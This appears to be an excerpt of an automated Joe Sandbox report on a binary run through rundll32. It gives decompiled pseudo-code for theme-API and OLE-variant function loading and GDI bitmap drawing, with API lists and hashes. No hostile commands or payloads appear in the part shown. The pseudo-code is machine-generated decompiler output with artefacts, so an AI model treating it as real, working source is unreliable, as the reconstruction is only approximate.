                          						 *0xe7f9d0 = GetProcAddress( *0xe7fa40, "GetThemeEnumValue");
                          						 *0xe7f9d4 = GetProcAddress( *0xe7fa40, "GetThemePosition");
                          						 *0xe7f9d8 = GetProcAddress( *0xe7fa40, "GetThemeFont");
                          						 *0xe7f9dc = GetProcAddress( *0xe7fa40, "GetThemeRect");
                          						 *0xe7f9e0 = GetProcAddress( *0xe7fa40, "GetThemeMargins");
                          						 *0xe7f9e4 = GetProcAddress( *0xe7fa40, "GetThemeIntList");
                          						 *0xe7f9e8 = GetProcAddress( *0xe7fa40, "GetThemePropertyOrigin");
                          						 *0xe7f9ec = GetProcAddress( *0xe7fa40, "SetWindowTheme");
                          						 *0xe7f9f0 = GetProcAddress( *0xe7fa40, "GetThemeFilename");
                          						 *0xe7f9f4 = GetProcAddress( *0xe7fa40, "GetThemeSysColor");
                          						 *0xe7f9f8 = GetProcAddress( *0xe7fa40, "GetThemeSysColorBrush");
                          						 *0xe7f9fc = GetProcAddress( *0xe7fa40, "GetThemeSysBool");
                          						 *0xe7fa00 = GetProcAddress( *0xe7fa40, "GetThemeSysSize");
                          						 *0xe7fa04 = GetProcAddress( *0xe7fa40, "GetThemeSysFont");
                          						 *0xe7fa08 = GetProcAddress( *0xe7fa40, "GetThemeSysString");
                          						 *0xe7fa0c = GetProcAddress( *0xe7fa40, "GetThemeSysInt");
                          						 *0xe7fa10 = GetProcAddress( *0xe7fa40, "IsThemeActive");
                          						 *0xe7fa14 = GetProcAddress( *0xe7fa40, "IsAppThemed");
                          						 *0xe7fa18 = GetProcAddress( *0xe7fa40, "GetWindowTheme");
                          						 *0xe7fa1c = GetProcAddress( *0xe7fa40, "EnableThemeDialogTexture");
                          						 *0xe7fa20 = GetProcAddress( *0xe7fa40, "IsThemeDialogTextureEnabled");
                          						 *0xe7fa24 = GetProcAddress( *0xe7fa40, "GetThemeAppProperties");
                          						 *0xe7fa28 = GetProcAddress( *0xe7fa40, "SetThemeAppProperties");
                          						 *0xe7fa2c = GetProcAddress( *0xe7fa40, "GetCurrentThemeName");
                          						 *0xe7fa30 = GetProcAddress( *0xe7fa40, "GetThemeDocumentationProperty");
                          						 *0xe7fa34 = GetProcAddress( *0xe7fa40, "DrawThemeParentBackground");
                          						 *0xe7fa38 = GetProcAddress( *0xe7fa40, "EnableTheming");
                          					}
                          				}
                          				_v5 =  *0xe7fa40 > 0;
                          				_pop(_t108);
                          				 *[fs:eax] = _t108;
                          				_push(0xe395d6);
                          				_t6 =  *0xe7fa48; // 0xf00dc8
                          				return E00E3901C(_t6);
                          			}

                          APIs
                          • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,00E395CF), ref: 00E39252
                          • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 00E3926A
                          • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 00E3927C
                          • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 00E3928E
                          • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 00E392A0
                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 00E392B2
                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 00E392C4
                          • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 00E392D6
                          • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 00E392E8
                          • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 00E392FA
                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 00E3930C
                          • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 00E3931E
                          • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 00E39330
                          • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 00E39342
                          • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 00E39354
                          • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 00E39366
                          • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 00E39378
                          • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 00E3938A
                          • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 00E3939C
                          • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 00E393AE
                          • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 00E393C0
                          • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 00E393D2
                          • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 00E393E4
                          • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 00E393F6
                          • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 00E39408
                          • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 00E3941A
                          • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 00E3942C
                          • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 00E3943E
                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00E39450
                          • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 00E39462
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 00E39474
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 00E39486
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 00E39498
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 00E394AA
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 00E394BC
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 00E394CE
                          • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 00E394E0
                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00E394F2
                          • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00E39504
                          • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 00E39516
                          • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 00E39528
                          • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 00E3953A
                          • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 00E3954C
                          • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 00E3955E
                          • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 00E39570
                          • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 00E39582
                          • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 00E39594
                          • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 00E395A6
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                          • API String ID: 2238633743-2910565190
                          • Opcode ID: 4fb8358f94289b8fc2de3b26a0a762fd9e5e7ad986869dc5cb82ff79193a8037
                          • Instruction ID: 238c7a610951a91076117c9fda7ace4d419aa159c5afe2f8dcc627e62c231836
                          • Opcode Fuzzy Hash: 4fb8358f94289b8fc2de3b26a0a762fd9e5e7ad986869dc5cb82ff79193a8037
                          • Instruction Fuzzy Hash: 1EA1E9B0A11720AFEF00EFB5D98AAA93BE8FB467007412575F414FF256D7B49885CB21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E1DE48() {
                          				struct HINSTANCE__* _v8;
                          				intOrPtr _t46;
                          				void* _t91;
                          
                          				_v8 = GetModuleHandleA("oleaut32.dll");
                          				 *0xe7f7a8 = E00E1DE1C("VariantChangeTypeEx", E00E1D9B8, _t91);
                          				 *0xe7f7ac = E00E1DE1C("VarNeg", E00E1D9E8, _t91);
                          				 *0xe7f7b0 = E00E1DE1C("VarNot", E00E1D9E8, _t91);
                          				 *0xe7f7b4 = E00E1DE1C("VarAdd", E00E1D9F4, _t91);
                          				 *0xe7f7b8 = E00E1DE1C("VarSub", E00E1D9F4, _t91);
                          				 *0xe7f7bc = E00E1DE1C("VarMul", E00E1D9F4, _t91);
                          				 *0xe7f7c0 = E00E1DE1C("VarDiv", E00E1D9F4, _t91);
                          				 *0xe7f7c4 = E00E1DE1C("VarIdiv", E00E1D9F4, _t91);
                          				 *0xe7f7c8 = E00E1DE1C("VarMod", E00E1D9F4, _t91);
                          				 *0xe7f7cc = E00E1DE1C("VarAnd", E00E1D9F4, _t91);
                          				 *0xe7f7d0 = E00E1DE1C("VarOr", E00E1D9F4, _t91);
                          				 *0xe7f7d4 = E00E1DE1C("VarXor", E00E1D9F4, _t91);
                          				 *0xe7f7d8 = E00E1DE1C("VarCmp", E00E1DA00, _t91);
                          				 *0xe7f7dc = E00E1DE1C("VarI4FromStr", E00E1DA0C, _t91);
                          				 *0xe7f7e0 = E00E1DE1C("VarR4FromStr", E00E1DA78, _t91);
                          				 *0xe7f7e4 = E00E1DE1C("VarR8FromStr", E00E1DAE4, _t91);
                          				 *0xe7f7e8 = E00E1DE1C("VarDateFromStr", E00E1DB50, _t91);
                          				 *0xe7f7ec = E00E1DE1C("VarCyFromStr", E00E1DBBC, _t91);
                          				 *0xe7f7f0 = E00E1DE1C("VarBoolFromStr", E00E1DC28, _t91);
                          				 *0xe7f7f4 = E00E1DE1C("VarBstrFromCy", E00E1DCA8, _t91);
                          				 *0xe7f7f8 = E00E1DE1C("VarBstrFromDate", E00E1DD18, _t91);
                          				_t46 = E00E1DE1C("VarBstrFromBool", E00E1DD88, _t91);
                          				 *0xe7f7fc = _t46;
                          				return _t46;
                          			}

                          APIs
                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 00E1DE51
                            • Part of subcall function 00E1DE1C: GetProcAddress.KERNEL32(00000000), ref: 00E1DE35
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                          • API String ID: 1646373207-1918263038
                          • Opcode ID: e3439a72efb972361ef734710e58b9f061fd83137afe0ab45128ff8d87e69d4e
                          • Instruction ID: 4c33e9c0f13b442dc113537450ba61192dca5ed20fbc4d7de6898cde34d0aa71
                          • Opcode Fuzzy Hash: e3439a72efb972361ef734710e58b9f061fd83137afe0ab45128ff8d87e69d4e
                          • Instruction Fuzzy Hash: 2A41F871A1C2455E5308AB6E7C034E7B7D9E7C8711364703BF818FB769D970A8E1872A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E00E31318(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                          				int _v8;
                          				int _v12;
                          				char _v13;
                          				struct HDC__* _v20;
                          				void* _v24;
                          				void* _v28;
                          				long _v32;
                          				long _v36;
                          				struct HPALETTE__* _v40;
                          				intOrPtr* _t78;
                          				struct HPALETTE__* _t89;
                          				struct HPALETTE__* _t95;
                          				int _t171;
                          				intOrPtr _t178;
                          				intOrPtr _t180;
                          				struct HDC__* _t182;
                          				int _t184;
                          				void* _t186;
                          				void* _t187;
                          				intOrPtr _t188;
                          
                          				_t186 = _t187;
                          				_t188 = _t187 + 0xffffffdc;
                          				_v12 = __ecx;
                          				_v8 = __edx;
                          				_t182 = __eax;
                          				_t184 = _a16;
                          				_t171 = _a20;
                          				_v13 = 1;
                          				_t78 =  *0xe7e30c; // 0xe7c0d4
                          				if( *_t78 != 2 || _t171 != _a40 || _t184 != _a36) {
                          					_v40 = 0;
                          					_v20 = E00E31174(CreateCompatibleDC(0));
                          					_push(_t186);
                          					_push(0xe31598);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t188;
                          					_v24 = E00E31174(CreateCompatibleBitmap(_a32, _t171, _t184));
                          					_v28 = SelectObject(_v20, _v24);
                          					_t89 =  *0xe7f894; // 0x6008075c
                          					_v40 = SelectPalette(_a32, _t89, 0);
                          					SelectPalette(_a32, _v40, 0);
                          					if(_v40 == 0) {
                          						_t95 =  *0xe7f894; // 0x6008075c
                          						_v40 = SelectPalette(_v20, _t95, 0xffffffff);
                          					} else {
                          						_v40 = SelectPalette(_v20, _v40, 0xffffffff);
                          					}
                          					RealizePalette(_v20);
                          					StretchBlt(_v20, 0, 0, _t171, _t184, _a12, _a8, _a4, _t171, _t184, 0xcc0020);
                          					StretchBlt(_v20, 0, 0, _t171, _t184, _a32, _a28, _a24, _t171, _t184, 0x440328);
                          					_v32 = SetTextColor(_t182, 0);
                          					_v36 = SetBkColor(_t182, 0xffffff);
                          					StretchBlt(_t182, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t171, _t184, 0x8800c6);
                          					StretchBlt(_t182, _v8, _v12, _a40, _a36, _v20, 0, 0, _t171, _t184, 0x660046);
                          					SetTextColor(_t182, _v32);
                          					SetBkColor(_t182, _v36);
                          					if(_v28 != 0) {
                          						SelectObject(_v20, _v28);
                          					}
                          					DeleteObject(_v24);
                          					_pop(_t178);
                          					 *[fs:eax] = _t178;
                          					_push(0xe3159f);
                          					if(_v40 != 0) {
                          						SelectPalette(_v20, _v40, 0);
                          					}
                          					return DeleteDC(_v20);
                          				} else {
                          					_v24 = E00E31174(CreateCompatibleBitmap(_a32, 1, 1));
                          					_v24 = SelectObject(_a12, _v24);
                          					_push(_t186);
                          					_push(0xe313eb);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t188;
                          					MaskBlt(_t182, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00E16CCC(0xaa0029, 0xcc0020));
                          					_pop(_t180);
                          					 *[fs:eax] = _t180;
                          					_push(0xe3159f);
                          					_v24 = SelectObject(_a12, _v24);
                          					return DeleteObject(_v24);
                          				}
                          			}

                          APIs
                          • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00E3135B
                          • SelectObject.GDI32(?,?), ref: 00E31370
                          • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00E313EB,?,?), ref: 00E313BF
                          • SelectObject.GDI32(?,?), ref: 00E313D9
                          • DeleteObject.GDI32(?), ref: 00E313E5
                          • CreateCompatibleDC.GDI32(00000000), ref: 00E313F9
                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00E3141A
                          • SelectObject.GDI32(?,?), ref: 00E3142F
                          • SelectPalette.GDI32(?,6008075C,00000000), ref: 00E31443
                          • SelectPalette.GDI32(?,?,00000000), ref: 00E31455
                          • SelectPalette.GDI32(?,00000000,000000FF), ref: 00E3146A
                          • SelectPalette.GDI32(?,6008075C,000000FF), ref: 00E31480
                          • RealizePalette.GDI32(?), ref: 00E3148C
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00E314AE
                          • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 00E314D0
                          • SetTextColor.GDI32(?,00000000), ref: 00E314D8
                          • SetBkColor.GDI32(?,00FFFFFF), ref: 00E314E6
                          • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00E31512
                          • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00E31537
                          • SetTextColor.GDI32(?,?), ref: 00E31541
                          • SetBkColor.GDI32(?,?), ref: 00E3154B
                          • SelectObject.GDI32(?,00000000), ref: 00E3155E
                          • DeleteObject.GDI32(?), ref: 00E31567
                          • SelectPalette.GDI32(?,00000000,00000000), ref: 00E31589
                          • DeleteDC.GDI32(?), ref: 00E31592
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                          • String ID:
                          • API String ID: 3976802218-0
                          • Opcode ID: 18008df3857d12db0402c764b9252e9c068d1e5cee8d2a485364830dd5e08615
                          • Instruction ID: 62595e907bcf813fff1054996288a588c253049c05c1077a2855c0e175a8725a
                          • Opcode Fuzzy Hash: 18008df3857d12db0402c764b9252e9c068d1e5cee8d2a485364830dd5e08615
                          • Instruction Fuzzy Hash: 78819DB2A00209AFDB50EFA8CD85EEF7BECAB0D714F151558F618F7281C634AD408B61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E00E3481C(void* __eax, long __ecx, struct HPALETTE__* __edx) {
                          				struct HBITMAP__* _v8;
                          				struct HDC__* _v12;
                          				struct HDC__* _v16;
                          				struct HDC__* _v20;
                          				char _v21;
                          				void* _v28;
                          				void* _v32;
                          				intOrPtr _v92;
                          				intOrPtr _v96;
                          				int _v108;
                          				int _v112;
                          				void _v116;
                          				int _t68;
                          				long _t82;
                          				void* _t117;
                          				intOrPtr _t126;
                          				intOrPtr _t127;
                          				long _t130;
                          				struct HPALETTE__* _t133;
                          				void* _t137;
                          				void* _t139;
                          				intOrPtr _t140;
                          
                          				_t137 = _t139;
                          				_t140 = _t139 + 0xffffff90;
                          				_t130 = __ecx;
                          				_t133 = __edx;
                          				_t117 = __eax;
                          				_v8 = 0;
                          				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
                          					return _v8;
                          				} else {
                          					E00E33D10(_t117);
                          					_v12 = 0;
                          					_v20 = 0;
                          					_push(_t137);
                          					_push(0xe34a17);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t140;
                          					_v12 = E00E31174(GetDC(0));
                          					_v20 = E00E31174(CreateCompatibleDC(_v12));
                          					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
                          					if(_v8 == 0) {
                          						L17:
                          						_t68 = 0;
                          						_pop(_t126);
                          						 *[fs:eax] = _t126;
                          						_push(0xe34a1e);
                          						if(_v20 != 0) {
                          							_t68 = DeleteDC(_v20);
                          						}
                          						if(_v12 != 0) {
                          							return ReleaseDC(0, _v12);
                          						}
                          						return _t68;
                          					} else {
                          						_v32 = SelectObject(_v20, _v8);
                          						if(_t130 != 0x1fffffff) {
                          							_v16 = E00E31174(CreateCompatibleDC(_v12));
                          							_push(_t137);
                          							_push(0xe349cf);
                          							_push( *[fs:eax]);
                          							 *[fs:eax] = _t140;
                          							if(_v96 == 0) {
                          								_v21 = 0;
                          							} else {
                          								_v21 = 1;
                          								_v92 = 0;
                          								_t117 = E00E34154(_t117, _t133, _t133, 0,  &_v116);
                          							}
                          							_v28 = SelectObject(_v16, _t117);
                          							if(_t133 != 0) {
                          								SelectPalette(_v16, _t133, 0);
                          								RealizePalette(_v16);
                          								SelectPalette(_v20, _t133, 0);
                          								RealizePalette(_v20);
                          							}
                          							_t82 = SetBkColor(_v16, _t130);
                          							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
                          							SetBkColor(_v16, _t82);
                          							if(_v28 != 0) {
                          								SelectObject(_v16, _v28);
                          							}
                          							if(_v21 != 0) {
                          								DeleteObject(_t117);
                          							}
                          							_pop(_t127);
                          							 *[fs:eax] = _t127;
                          							_push(0xe349d6);
                          							return DeleteDC(_v16);
                          						} else {
                          							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
                          							if(_v32 != 0) {
                          								SelectObject(_v20, _v32);
                          							}
                          							goto L17;
                          						}
                          					}
                          				}
			}

                          APIs
                          • GetObjectA.GDI32(?,00000054,?), ref: 00E3483F
                          • GetDC.USER32(00000000), ref: 00E3486D
                          • CreateCompatibleDC.GDI32(?), ref: 00E3487E
                          • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00E34899
                          • SelectObject.GDI32(?,00000000), ref: 00E348B3
                          • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00E348D5
                          • CreateCompatibleDC.GDI32(?), ref: 00E348E3
                          • SelectObject.GDI32(?), ref: 00E3492B
                          • SelectPalette.GDI32(?,?,00000000), ref: 00E3493E
                          • RealizePalette.GDI32(?), ref: 00E34947
                          • SelectPalette.GDI32(?,?,00000000), ref: 00E34953
                          • RealizePalette.GDI32(?), ref: 00E3495C
                          • SetBkColor.GDI32(?), ref: 00E34966
                          • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00E3498A
                          • SetBkColor.GDI32(?,00000000), ref: 00E34994
                          • SelectObject.GDI32(?,00000000), ref: 00E349A7
                          • DeleteObject.GDI32 ref: 00E349B3
                          • DeleteDC.GDI32(?), ref: 00E349C9
                          • SelectObject.GDI32(?,00000000), ref: 00E349E4
                          • DeleteDC.GDI32(00000000), ref: 00E34A00
                          • ReleaseDC.USER32 ref: 00E34A11
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
• Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                          • String ID:
                          • API String ID: 332224125-0
                          • Opcode ID: 7331a18b7bd76e054cf70d41f6963aa7e9bc8ebd63e4d92d5464113f4522a71f
                          • Instruction ID: 1a09acef02c71f1fe60d09ea2703e2c6d4842cff67f893ced3b879e4608f9fa9
                          • Opcode Fuzzy Hash: 7331a18b7bd76e054cf70d41f6963aa7e9bc8ebd63e4d92d5464113f4522a71f
                          • Instruction Fuzzy Hash: E051EDB1E40319ABDB10EBE88C5AFEEBBFCAB49700F115855B614F7281D674A940CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E00E35624(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
                          				intOrPtr _v8;
                          				intOrPtr* _v12;
                          				struct HDC__* _v16;
                          				struct HDC__* _v20;
                          				void* _v24;
                          				BITMAPINFOHEADER* _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				signed int _v37;
                          				struct HBITMAP__* _v44;
                          				void* _v48;
                          				struct HPALETTE__* _v52;
                          				struct HPALETTE__* _v56;
                          				intOrPtr* _v60;
                          				intOrPtr* _v64;
                          				short _v66;
                          				short _v68;
                          				signed short _v70;
                          				signed short _v72;
                          				void* _v76;
                          				intOrPtr _v172;
                          				char _v174;
                          				intOrPtr _t150;
                          				signed int _t160;
                          				intOrPtr _t164;
                          				signed int _t193;
                          				signed int _t218;
                          				signed short _t224;
                          				intOrPtr _t251;
                          				intOrPtr* _t255;
                          				intOrPtr _t261;
                          				intOrPtr _t299;
                          				intOrPtr _t300;
                          				intOrPtr _t305;
                          				signed int _t307;
                          				signed int _t327;
                          				void* _t329;
                          				void* _t330;
                          				signed int _t331;
                          				void* _t332;
                          				void* _t333;
                          				void* _t334;
                          				intOrPtr _t335;
                          
                          				_t326 = __edi;
                          				_t333 = _t334;
                          				_t335 = _t334 + 0xffffff54;
                          				_t329 = __ecx;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_v52 = 0;
                          				_v44 = 0;
                          				_v60 = 0;
                          				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t332);
                          				_v37 = _v36 == 0xc;
                          				if(_v37 != 0) {
                          					_v36 = 0x28;
                          				}
                          				_v28 = E00E126CC(_v36 + 0x40c);
                          				_v64 = _v28;
                          				_push(_t333);
                          				_push(0xe35b41);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t335;
                          				_push(_t333);
                          				_push(0xe35b14);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t335;
                          				if(_v37 == 0) {
                          					 *((intOrPtr*)( *_v12 + 0xc))();
                          					_t330 = _t329 - _v36;
                          					_t150 =  *((intOrPtr*)(_v64 + 0x10));
                          					if(_t150 != 3 && _t150 != 0) {
                          						_v60 = E00E13244(1);
                          						if(_a4 == 0) {
                          							E00E12C80( &_v174, 0xe);
                          							_v174 = 0x4d42;
                          							_v172 = _v36 + _t330;
                          							_a4 =  &_v174;
                          						}
                          						 *((intOrPtr*)( *_v60 + 0x10))();
                          						 *((intOrPtr*)( *_v60 + 0x10))();
                          						 *((intOrPtr*)( *_v60 + 0x10))();
                          						E00E29144(_v60,  *_v60, _v12, _t326, _t330, _t330, 0);
                          						 *((intOrPtr*)( *_v60 + 0x14))();
                          						_v12 = _v60;
                          					}
                          				} else {
                          					 *((intOrPtr*)( *_v12 + 0xc))();
                          					_t261 = _v64;
                          					E00E12C80(_t261, 0x28);
                          					_t251 = _t261;
                          					 *(_t251 + 4) = _v72 & 0x0000ffff;
                          					 *(_t251 + 8) = _v70 & 0x0000ffff;
                          					 *((short*)(_t251 + 0xc)) = _v68;
                          					 *((short*)(_t251 + 0xe)) = _v66;
                          					_t330 = _t329 - 0xc;
                          				}
                          				_t255 = _v64;
                          				 *_t255 = _v36;
                          				_v32 = _v28 + _v36;
                          				if( *((short*)(_t255 + 0xc)) != 1) {
                          					E00E31054();
                          				}
                          				if(_v36 == 0x28) {
                          					_t224 =  *(_t255 + 0xe);
                          					if(_t224 == 0x10 || _t224 == 0x20) {
                          						if( *((intOrPtr*)(_t255 + 0x10)) == 3) {
                          							E00E290D4(_v12, 0xc, _v32);
                          							_v32 = _v32 + 0xc;
                          							_t330 = _t330 - 0xc;
                          						}
                          					}
                          				}
                          				if( *(_t255 + 0x20) == 0) {
                          					 *(_t255 + 0x20) = E00E312E4( *(_t255 + 0xe));
                          				}
                          				_t327 = _v37 & 0x000000ff;
                          				_t267 =  *(_t255 + 0x20) * 0;
                          				E00E290D4(_v12,  *(_t255 + 0x20) * 0, _v32);
                          				_t331 = _t330 -  *(_t255 + 0x20) * 0;
                          				if( *(_t255 + 0x14) == 0) {
                          					_t307 =  *(_t255 + 0xe) & 0x0000ffff;
                          					_t218 = E00E31304( *((intOrPtr*)(_t255 + 4)), 0x20, _t307);
                          					asm("cdq");
                          					_t267 = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
                          					 *(_t255 + 0x14) = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
                          				}
                          				_t160 =  *(_t255 + 0x14);
                          				if(_t331 > _t160) {
                          					_t331 = _t160;
                          				}
                          				if(_v37 != 0) {
                          					E00E315AC(_v32);
                          				}
                          				_v16 = E00E31174(GetDC(0));
                          				_push(_t333);
                          				_push(0xe35a8f);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t335;
                          				_t164 =  *((intOrPtr*)(_v64 + 0x10));
                          				if(_t164 == 0 || _t164 == 3) {
                          					if( *0xe7c460 == 0) {
                          						_v44 = CreateDIBSection(_v16, _v28, 0,  &_v24, 0, 0);
                          						if(_v44 == 0 || _v24 == 0) {
                          							if(GetLastError() != 0) {
                          								E00E1CDE4(_t255, _t267, _t327, _t331);
                          							} else {
